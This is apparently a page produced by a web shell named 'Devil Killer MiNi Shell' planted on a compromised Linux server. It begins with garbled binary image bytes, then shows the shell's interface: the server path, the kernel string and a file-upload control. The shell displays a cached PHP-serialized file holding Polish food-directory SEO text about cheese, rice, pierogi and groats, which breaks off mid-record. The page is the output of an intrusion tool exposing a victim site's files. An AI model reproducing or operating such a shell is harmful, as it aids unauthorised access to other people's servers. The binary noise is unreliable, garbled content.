JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/cache/c4/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/cache/c4/c4a8985b30a555b28681eba5c8aa4542.bin

a:2:{i:0;a:1:{i:0;a:4:{i:0;a:10:{s:11:"id_category";i:1492;s:9:"id_portal";i:71;s:4:"name";s:14:"Sery i twarogi";s:11:"description";N;s:4:"left";i:73;s:5:"right";i:74;s:5:"depth";i:2;s:10:"created_at";s:19:"2019-10-24 16:50:13";s:10:"updated_at";s:19:"2025-10-24 02:51:09";s:12:"seo_metadata";s:6690:"{"p_71": {"faq": "<script type=\"application/ld+json\">\n{\n  \"@context\": \"https://schema.org\",\n  \"@type\": \"FAQPage\",\n  \"mainEntity\": [\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy sery pleśniowe są popularne?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, rośnie zainteresowanie serami premium i rzemieślniczymi.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy sery BIO są dostępne?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, wielu producentów oferuje ekologiczne warianty serów i twarogów.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Jak prawidłowo przechowywać sery i twarogi?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Sery najlepiej przechowywać w lodówce w oryginalnym opakowaniu lub owinięte w pergamin; twarogi w szczelnym pojemniku. Temperatury i wilgotność zależą od rodzaju sera.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy twarogi nadają się dla osób na diecie?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak — twarogi są źródłem białka i mogą być elementem diety niskotłuszczowej, warto jednak sprawdzać zawartość tłuszczu i soli.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Jakie certyfikaty świadczą o jakości serów?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Certyfikaty ekologiczne (BIO), HACCP, ISO oraz lokalne oznaczenia jakości regionalnej są najczęściej uznawane.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy producenci oferują sery na private label?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, wiele firm świadczy usługi private label, umożliwiając produkcję serów pod marką zamawiającego.\"\n      }\n    }\n  ]\n}\n</script>", "about": "Lista firm w kategorii Sery i twarogi: sery białe, żółte, pleśniowe, sery regionalne, twarogi oraz produkty ekologiczne i private label.", "title": "Sery i twarogi – producenci, dostawcy i firmy | Jedzenie.info.pl", "keywords": "sery i twarogi, sery, twaróg, sery pleśniowe, sery żółte, sery regionalne, sery rzemieślnicze, produkty BIO, sery ekologiczne, private label sery", "description_html": "<h1>Sery i twarogi</h1>\n<p>To jedne z najbardziej zróżnicowanych produktów nabiałowych, cenione za smak, wartości odżywcze i szerokie zastosowanie. Obejmują zarówno sery świeże, jak i dojrzewające.</p>\n\n<h2>Najważniejsze informacje:</h2>\n<ul>\n<li>Różnorodność: sery świeże, dojrzewające, pleśniowe oraz regionalne i rzemieślnicze</li>\n<li>Główne rynki zbytu: handel detaliczny, hurt, gastronomia i eksport</li>\n<li>Ważne kryteria wyboru: skład, świeżość, proces dojrzewania i certyfikaty jakości</li>\n<li>Produkty BIO i ekologiczne zyskują na popularności</li>\n<li>Możliwości produkcyjne: private label, sery regionalne i sery specjalistyczne</li>\n</ul>\n\n<p><!-- pagebreak --></p>\n<h2>Wprowadzenie / kontekst kategorii</h2>\n<p>Kategoria „Sery i twarogi” obejmuje producentów i dystrybutorów różnorodnych serów i twarogów.</p>\n<h2>Co oferują firmy z tej kategorii?</h2>\n<ul>\n  <li><a title=\"Sery białe i twarogi\" href=\"https://www.jedzenie.info.pl/firmy/lista/1492_sery-i-twarogi\" target=\"_blank\" rel=\"noopener\">Sery białe i twarogi</a></li>\n  <li><a title=\"Sery żółte i dojrzewające\" href=\"https://www.jedzenie.info.pl/firmy/lista/1492_sery-i-twarogi\" target=\"_blank\" rel=\"noopener\">Sery żółte i dojrzewające</a></li>\n  <li><a title=\"Sery pleśniowe\" href=\"https://www.jedzenie.info.pl/firmy/lista/1492_sery-i-twarogi\" target=\"_blank\" rel=\"noopener\">Sery pleśniowe</a></li>\n  <li><a title=\"Sery regionalne i rzemieślnicze\" href=\"https://www.jedzenie.info.pl/firmy/lista/1492_sery-i-twarogi\" target=\"_blank\" rel=\"noopener\">Sery regionalne i rzemieślnicze</a></li>\n  <li><a title=\"Produkty BIO i ekologiczne\" href=\"https://www.jedzenie.info.pl/firmy/lista/1534_produkty-ekologiczne\" target=\"_blank\" rel=\"noopener\">Produkty BIO i ekologiczne</a></li>\n  <li>Private label</li>\n</ul>\n<h2>Na co zwrócić uwagę przy wyborze / kryteria doboru</h2>\n<p>Ważne są: skład, proces dojrzewania, świeżość, certyfikaty jakości i warunki przechowywania.</p>\n<h2>Korzyści biznesowe i operacyjne</h2>\n<p>Sery i twarogi to produkty o wysokim popycie, atrakcyjne dla rynku detalicznego, gastronomii i eksportu.</p>\n<h2>Zastosowania / przykładowe scenariusze</h2>\n<ul>\n  <li>Handel detaliczny i hurtowy</li>\n  <li>Gastronomia i HoReCa</li>\n  <li>Produkcja dań gotowych i pizzy</li>\n  <li>Eksport</li>\n</ul>\n<h2>Najczęściej zadawane pytania (FAQ)</h2>\n<h3>Czy sery pleśniowe są popularne?</h3>\n<p>Tak, rośnie zainteresowanie serami premium i rzemieślniczymi.</p>\n<h3>Czy sery BIO są dostępne?</h3>\n<p>Tak, wielu producentów oferuje ekologiczne warianty serów i twarogów.</p>\n<h3>Jak prawidłowo przechowywać sery i twarogi?</h3>\n<p>Sery najlepiej przechowywać w lodówce w oryginalnym opakowaniu lub owinięte w pergamin; twarogi w szczelnym pojemniku. Temperatury i wilgotność zależą od rodzaju sera.</p>\n<h3>Czy twarogi nadają się dla osób na diecie?</h3>\n<p>Tak — twarogi są źródłem białka i mogą być elementem diety niskotłuszczowej, warto jednak sprawdzać zawartość tłuszczu i soli.</p>\n<h3>Jakie certyfikaty świadczą o jakości serów?</h3>\n<p>Certyfikaty ekologiczne (BIO), HACCP, ISO oraz lokalne oznaczenia jakości regionalnej są najczęściej uznawane.</p>\n<h3>Czy producenci oferują sery na private label?</h3>\n<p>Tak, wiele firm świadczy usługi private label, umożliwiając produkcję serów pod marką zamawiającego.</p>\n<h2>Zobacz również</h2>\n<ul>\n  <li><a title=\"Nabiał\" href=\"https://www.jedzenie.info.pl/firmy/lista/1486_nabial\" target=\"_blank\" rel=\"noopener\">Nabiał</a></li>\n  <li><a title=\"Jogurty\" href=\"https://www.jedzenie.info.pl/firmy/lista/1488_jogurty-serki-desery\" target=\"_blank\" rel=\"noopener\">Jogurty</a></li>\n  <li><a title=\"Mleko\" href=\"https://www.jedzenie.info.pl/firmy/lista/1490_mleko\" target=\"_blank\" rel=\"noopener\">Mleko</a></li>\n</ul>", "description_plaintext": "Znajdź producentów i dostawców serów i twarogów: sery świeże, dojrzewające, pleśniowe, regionalne oraz produkty ekologiczne. Sprawdź ofertę firm i możliwości private label."}}";}i:1;a:10:{s:11:"id_category";i:1542;s:9:"id_portal";i:71;s:4:"name";s:4:"Ryż";s:11:"description";N;s:4:"left";i:167;s:5:"right";i:168;s:5:"depth";i:2;s:10:"created_at";s:19:"2019-10-24 16:50:13";s:10:"updated_at";s:19:"2025-10-24 02:51:09";s:12:"seo_metadata";s:7524:"{"p_71": {"faq": "<script type=\"application/ld+json\">\n{\n  \"@context\": \"https://schema.org\",\n  \"@type\": \"FAQPage\",\n  \"mainEntity\": [\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy ryż brązowy jest zdrowszy?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, zawiera więcej błonnika i minerałów niż ryż biały.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy ryż jest bezglutenowy?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, wszystkie odmiany ryżu są naturalnie bezglutenowe.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy ryż BIO różni się od zwykłego?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, pochodzi z upraw ekologicznych i jest wolny od chemicznych dodatków.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Jak długo można przechowywać ryż?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Biały ryż przechowywany w suchym, chłodnym miejscu może zachować jakość przez 1–2 lata lub dłużej; ryż brązowy ma krótszy okres przydatności (ok. 6–12 miesięcy) ze względu na zawartość olejów w otrębach.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Jaki jest prawidłowy stosunek ryżu do wody przy gotowaniu?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Dla większości białych odmian stosunek wynosi około 1:2 (ryż:woda). Basmati często gotuje się w stosunku 1:1,5, a ryż brązowy wymaga nieco więcej wody i dłuższego gotowania (ok. 1:2,5).\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czym różnią się ryż basmati i jaśminowy?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Basmati ma długoziarniste, sypkie ziarno o orzechowym aromacie, idealne do potraw indyjskich; jaśminowy jest aromatyczny, lekko kleisty po ugotowaniu i często używany w kuchni południowo-wschodniej Azji.\"\n      }\n    }\n  ]\n}\n</script>", "about": "Lista firm z kategorii ryż: producenci i dostawcy ryżu białego, brązowego, parboiled, basmati, jaśminowego, ryżu BIO, mieszanki oraz usługi logistyczne i opakowaniowe.", "title": "Ryż – producenci, dostawcy i firmy | Jedzenie.info.pl", "keywords": "ryż, ryż biały, ryż brązowy, ryż parboiled, ryż basmati, ryż jaśminowy, ryż BIO, ryż bezglutenowy, mieszanki ryżowe, ryż instant, producenci ryżu, dostawcy ryżu", "description_html": "<h1>Ryż</h1>\n<p>To jedno z najważniejszych zbóż na świecie, będące podstawą wyżywienia miliardów ludzi. W tej kategorii znajdziesz producentów i dostawców ryżu białego, brązowego, parboiled, basmati, jaśminowego i innych odmian.</p>\n\n<h2>Najważniejsze informacje:</h2>\n<ul>\n<li>Różne odmiany: biały, brązowy, parboiled, basmati, jaśminowy i inne</li>\n<li>Ryż BIO i bezglutenowy dostępny w ofercie hurtowej i detalicznej</li>\n<li>Zastosowania: gastronomia, przemysł spożywczy, catering i handel detaliczny</li>\n<li>Istotne kryteria: pochodzenie, certyfikaty, stopień przetworzenia i czas gotowania</li>\n<li>Opakowania detaliczne i hurtowe oraz usługi importu i eksportu</li>\n</ul>\n\n<p><!-- pagebreak --></p>\n<h2>Wprowadzenie / kontekst kategorii</h2>\n<p>Ryż to źródło energii, węglowodanów i minerałów. W kuchni światowej występuje w setkach odmian i zastosowań. Coraz większe znaczenie ma ryż BIO i pełnoziarnisty, odpowiadający trendom zdrowej diety. Branża obejmuje handel detaliczny, gastronomię i przemysł spożywczy.</p>\n<h2>Co oferują firmy z tej kategorii?</h2>\n<ul>\n  <li><a title=\"Ryż biały i brązowy\" href=\"https://www.jedzenie.info.pl/firmy/lista/1542_ryz\" target=\"_blank\" rel=\"noopener\">Ryż biały i brązowy</a></li>\n  <li><a title=\"Ryż parboiled\" href=\"https://www.jedzenie.info.pl/firmy/lista/1542_ryz\" target=\"_blank\" rel=\"noopener\">Ryż parboiled</a></li>\n  <li><a title=\"Ryż basmati i jaśminowy\" href=\"https://www.jedzenie.info.pl/firmy/lista/1542_ryz\" target=\"_blank\" rel=\"noopener\">Ryż basmati i jaśminowy</a></li>\n  <li><a title=\"Ryż BIO i bezglutenowy\" href=\"https://www.jedzenie.info.pl/firmy/lista/1542_ryz\" target=\"_blank\" rel=\"noopener\">Ryż BIO i bezglutenowy</a></li>\n  <li>Mieszanki ryżowe (np. z dzikim ryżem)</li>\n  <li>Ryż instant i ekspandowany</li>\n  <li><a title=\"Opakowania detaliczne i hurtowe\" href=\"https://www.jedzenie.info.pl/firmy/lista/1504_opakowania-spozywcze\" target=\"_blank\" rel=\"noopener\">Opakowania detaliczne i hurtowe</a></li>\n  <li>Usługi importu i eksportu</li>\n</ul>\n<h2>Na co zwrócić uwagę przy wyborze / kryteria doboru</h2>\n<p>Ważne są odmiana ryżu, stopień przetworzenia, certyfikaty jakości i pochodzenie. Gastronomia zwraca uwagę na czas gotowania, smak i możliwości zastosowania w różnych kuchniach.</p>\n<h2>Korzyści biznesowe i operacyjne</h2>\n<p>Ryż jest produktem uniwersalnym, łatwym w przechowywaniu i szeroko dostępnym. Dzięki bogactwu odmian pozwala różnicować ofertę handlową i gastronomiczną.</p>\n<h2>Zastosowania / przykładowe scenariusze</h2>\n<p>Restauracje azjatyckie używają ryżu jaśminowego i basmati. Firmy cateringowe zamawiają ryż parboiled. Sklepy detaliczne oferują ryż BIO i pełnoziarnisty. Przemysł spożywczy stosuje ryż do produkcji wafli i mąki ryżowej.</p>\n<h2>Najczęściej zadawane pytania (FAQ)</h2>\n<h3>Czy ryż brązowy jest zdrowszy?</h3>\n<p>Tak, zawiera więcej błonnika i minerałów niż ryż biały.</p>\n<h3>Czy ryż jest bezglutenowy?</h3>\n<p>Tak, wszystkie odmiany ryżu są naturalnie bezglutenowe.</p>\n<h3>Czy ryż BIO różni się od zwykłego?</h3>\n<p>Tak, pochodzi z upraw ekologicznych i jest wolny od chemicznych dodatków.</p>\n<h3>Jak długo można przechowywać ryż?</h3>\n<p>Biały ryż przechowywany w suchym, chłodnym miejscu może zachować jakość przez 1–2 lata lub dłużej; ryż brązowy ma krótszy okres przydatności (ok. 6–12 miesięcy) ze względu na zawartość olejów w otrębach.</p>\n<h3>Jaki jest prawidłowy stosunek ryżu do wody przy gotowaniu?</h3>\n<p>Dla większości białych odmian stosunek wynosi około 1:2 (ryż:woda). Basmati często gotuje się w stosunku 1:1,5, a ryż brązowy wymaga nieco więcej wody i dłuższego gotowania (ok. 1:2,5).</p>\n<h3>Czym różnią się ryż basmati i jaśminowy?</h3>\n<p>Basmati ma długoziarniste, sypkie ziarno o orzechowym aromacie, idealne do potraw indyjskich; jaśminowy jest aromatyczny, lekko kleisty po ugotowaniu i często używany w kuchni południowo-wschodniej Azji.</p>\n<h2>Zobacz również</h2>\n<ul>\n  <li><a title=\"Kasza\" href=\"https://www.jedzenie.info.pl/firmy/lista/1538_kasza\" target=\"_blank\" rel=\"noopener\">Kasza</a></li>\n  <li><a title=\"Mąka\" href=\"https://www.jedzenie.info.pl/firmy/lista/1539_maka\" target=\"_blank\" rel=\"noopener\">Mąka</a></li>\n  <li><a title=\"Ziarna, nasiona\" href=\"https://www.jedzenie.info.pl/firmy/lista/1543_ziarna-nasiona\" target=\"_blank\" rel=\"noopener\">Ziarna, nasiona</a></li>\n</ul>", "description_plaintext": "Znajdź producentów i dostawców ryżu: biały, brązowy, parboiled, basmati, jaśminowy, BIO i bezglutenowy. Sprawdź ofertę hurtową i detaliczną, mieszanki oraz import i eksport."}}";}i:2;a:10:{s:11:"id_category";i:1547;s:9:"id_portal";i:71;s:4:"name";s:21:"Pierogi, pyzy, kluski";s:11:"description";N;s:4:"left";i:177;s:5:"right";i:178;s:5:"depth";i:2;s:10:"created_at";s:19:"2019-10-24 16:50:13";s:10:"updated_at";s:19:"2025-10-24 02:51:09";s:12:"seo_metadata";s:6807:"{"p_71": {"faq": "<script type=\"application/ld+json\">\n{\n  \"@context\": \"https://schema.org\",\n  \"@type\": \"FAQPage\",\n  \"mainEntity\": [\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy pierogi mrożone są smaczne?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, zachowują smak i wartości odżywcze, jeśli są odpowiednio przygotowane.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy dostępne są produkty bezglutenowe?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, producenci oferują pierogi i kluski w wersji bezglutenowej.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy możliwe są dostawy hurtowe?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, wielu producentów obsługuje handel i gastronomię.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Jak przechowywać pierogi mrożone?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Pierogi mrożone przechowuj w zamrażarce w temperaturze -18°C lub niższej; po rozmrożeniu najlepiej spożyć w ciągu 24 godzin.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Jak najlepiej odgrzać pierogi, by zachowały smak?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Pierogi można gotować w osolonej wodzie krótko po rozmrożeniu, podsmażyć na patelni lub podgrzać w piekarniku — wybór metody zależy od preferowanej tekstury.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy producenci oferują pierogi wegańskie?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, coraz więcej firm wprowadza pierogi i kluski w wersjach wegańskich, z nadzieniami warzywnymi lub roślinnymi zamiennikami mięsa.\"\n      }\n    }\n  ]\n}\n</script>", "about": "Lista firm w kategorii pierogi, pyzy i kluski: pierogi z różnym nadzieniem, pyzy, kluski, produkty świeże i mrożone, oferty dla gastronomii i handlu.", "title": "Pierogi, pyzy i kluski – producenci, dostawcy i firmy | Jedzenie.info.pl", "keywords": "pierogi, pyzy, kluski, pierogi mrożone, pierogi bezglutenowe, pierogi BIO, pyzy producent, kluski producent, pierogi dla gastronomii, pierogi private label", "description_html": "<h1>Pierogi, pyzy i kluski to tradycyjne dania mączne, które od wieków goszczą w polskiej kuchni. W tej kategorii znajdziesz producentów i dostawców wyrobów świeżych, mrożonych i gotowych do spożycia.</h1>\n<h2>Najważniejsze informacje:</h2>\n<ul>\n<li>Szeroki wybór pierogów, pyz i klusek — świeżych, mrożonych i gotowych</li>\n<li>Dostępne wersje tradycyjne, rzemieślnicze oraz przemysłowe</li>\n<li>Opcje dla diet specjalnych: bezglutenowe, wegańskie i BIO</li>\n<li>Produkty przeznaczone dla handlu detalicznego i gastronomii (dostawy hurtowe)</li>\n<li>Możliwość usług private label i eksportu</li>\n</ul>\n<p><!-- pagebreak --></p>\n<h2>Wprowadzenie / kontekst kategorii</h2>\n<p>Pierogi, pyzy i kluski to potrawy, które łączą tradycję kulinarną z nowoczesnym podejściem do wygody. Występują w wielu wariantach smakowych i są popularne zarówno w kuchni domowej, jak i w gastronomii. Branża oferuje produkty świeże, mrożone oraz BIO, odpowiadając na rosnące oczekiwania konsumentów.</p>\n<h2>Co oferują firmy z tej kategorii?</h2>\n<ul>\n  <li><a href=\"https://www.jedzenie.info.pl/firmy/lista/1547_pierogi-pyzy-kluski\" title=\"Pierogi z różnym nadzieniem (mięsne, warzywne, owocowe)\" target=\"_blank\" rel=\"noopener\">Pierogi z różnym nadzieniem (mięsne, warzywne, owocowe)</a></li>\n  <li>Pyzy z mięsem, ziemniaczane i drożdżowe</li>\n  <li>Kopytka, kluski śląskie, leniwe</li>\n  <li>Produkty świeże i mrożone</li>\n  <li><a href=\"https://www.jedzenie.info.pl/firmy/lista/1534_produkty-ekologiczne\" title=\"Produkty BIO\" target=\"_blank\" rel=\"noopener\">Produkty BIO</a> i bezglutenowe</li>\n  <li>Wyroby rzemieślnicze i przemysłowe</li>\n  <li>Usługi private label i eksportowe</li>\n</ul>\n<h2>Na co zwrócić uwagę przy wyborze / kryteria doboru</h2>\n<p>Ważne są składniki, świeżość i jakość produktu, forma (świeże, mrożone), certyfikaty jakości oraz stabilność dostaw. Gastronomia oczekuje różnorodności smaków i dostępności dużych wolumenów.</p>\n<h2>Korzyści biznesowe i operacyjne</h2>\n<p>Pierogi, pyzy i kluski mają szerokie zastosowanie w kuchni. Stanowią wygodny produkt dla gastronomii i handlu, a w wersji mrożonej zapewniają długi termin przydatności. Produkty BIO i bezglutenowe zwiększają atrakcyjność oferty.</p>\n<h2>Zastosowania / przykładowe scenariusze</h2>\n<p>Restauracje serwują pierogi rzemieślnicze. Sklepy detaliczne oferują pyzy mrożone. Firmy cateringowe korzystają z klusek w zestawach obiadowych.</p>\n<h2>Najczęściej zadawane pytania (FAQ)</h2>\n<h3>Czy pierogi mrożone są smaczne?</h3>\n<p>Tak, zachowują smak i wartości odżywcze, jeśli są odpowiednio przygotowane.</p>\n<h3>Czy dostępne są produkty bezglutenowe?</h3>\n<p>Tak, producenci oferują pierogi i kluski w wersji bezglutenowej.</p>\n<h3>Czy możliwe są dostawy hurtowe?</h3>\n<p>Tak, wielu producentów obsługuje handel i gastronomię.</p>\n<h3>Jak przechowywać pierogi mrożone?</h3>\n<p>Pierogi mrożone przechowuj w zamrażarce w temperaturze -18°C lub niższej; po rozmrożeniu najlepiej spożyć w ciągu 24 godzin.</p>\n<h3>Jak najlepiej odgrzać pierogi, by zachowały smak?</h3>\n<p>Pierogi można gotować w osolonej wodzie krótko po rozmrożeniu, podsmażyć na patelni lub podgrzać w piekarniku — wybór metody zależy od preferowanej tekstury.</p>\n<h3>Czy producenci oferują pierogi wegańskie?</h3>\n<p>Tak, coraz więcej firm wprowadza pierogi i kluski w wersjach wegańskich, z nadzieniami warzywnymi lub roślinnymi zamiennikami mięsa.</p>\n<h2>Zobacz również</h2>\n<ul>\n  <li><a title=\"Makaron\" href=\"https://www.jedzenie.info.pl/firmy/lista/1546_makaron\" target=\"_blank\" rel=\"noopener\">Makaron</a></li>\n  <li><a title=\"Przetwory mączne\" href=\"https://www.jedzenie.info.pl/firmy/lista/1545_przetwory-maczne\" target=\"_blank\" rel=\"noopener\">Przetwory mączne</a></li>\n  <li><a title=\"Produkty ekologiczne\" href=\"https://www.jedzenie.info.pl/firmy/lista/1534_produkty-ekologiczne\" target=\"_blank\" rel=\"noopener\">Produkty ekologiczne</a></li>\n</ul>", "description_plaintext": "Znajdź producentów i dostawców pierogów, pyz i klusek — produkty świeże, mrożone, BIO oraz bezglutenowe. Sprawdź ofertę dla handlu i gastronomii w katalogu firm."}}";}i:3;a:10:{s:11:"id_category";i:1538;s:9:"id_portal";i:71;s:4:"name";s:5:"Kasza";s:11:"description";N;s:4:"left";i:159;s:5:"right";i:160;s:5:"depth";i:2;s:10:"created_at";s:19:"2019-10-24 16:50:13";s:10:"updated_at";s:19:"2025-10-24 02:51:09";s:12:"seo_metadata";s:7978:"{"p_71": {"faq": "<script type=\"application/ld+json\">\n{\n  \"@context\": \"https://schema.org\",\n  \"@type\": \"FAQPage\",\n  \"mainEntity\": [\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy kasze są bezglutenowe?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Nie wszystkie – bezglutenowe są m.in. kasza jaglana i gryczana, ale jęczmienna czy manna zawierają gluten.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy kasze BIO różnią się od tradycyjnych?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, pochodzą z certyfikowanych upraw ekologicznych i są wolne od pestycydów.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Czy kasze ekspandowane są zdrowe?\",\n      \"acceptedAnswer\": {\n        \"@type\": \"Answer\",\n        \"text\": \"Tak, stanowią lekkostrawny produkt, często stosowany w dietach dziecięcych.\"\n      }\n    },\n    {\n      \"@type\": \"Question\",\n      \"name\": \"Jak prawidłowo 